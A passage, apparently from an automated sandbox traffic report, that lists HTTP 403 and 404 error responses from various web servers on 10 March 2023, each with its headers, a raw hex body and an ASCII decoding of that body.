6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Mar 2023 06:56:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 2X-Kong-Proxy-Latency: 0Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: b4c07d0468 0.32 0.001419 0030 57daPragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wd7fQNAnQTK29Qx4Fs99E29nCijuu4tSY8no%2FUqcWBSY6Svg4P8%2BMN6foXZWJuB3YKZ%2Bk1kDGQYRofpFoGP7b%2B2x9aSACSKs9JACJvqJDABZZBNM64EK9c5GTGt5ChqJk0g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a859cd3c8fce-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-siz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:24 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LLCYGEfax29uubqNmVTOEGnK%2FQATk%2Ft%2BPpC1Bi6jLhmbQh50%2FhprTNosprKu99h%2BOUMauFWNBqCXrZazWnYjoc5%2BFIDqbVOCryJx8CttfUVPvLmKz9gb31kgaSk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a85a1d9ebbe3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Fri, 10 Mar 2023 06:56:24 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:25 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:25 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
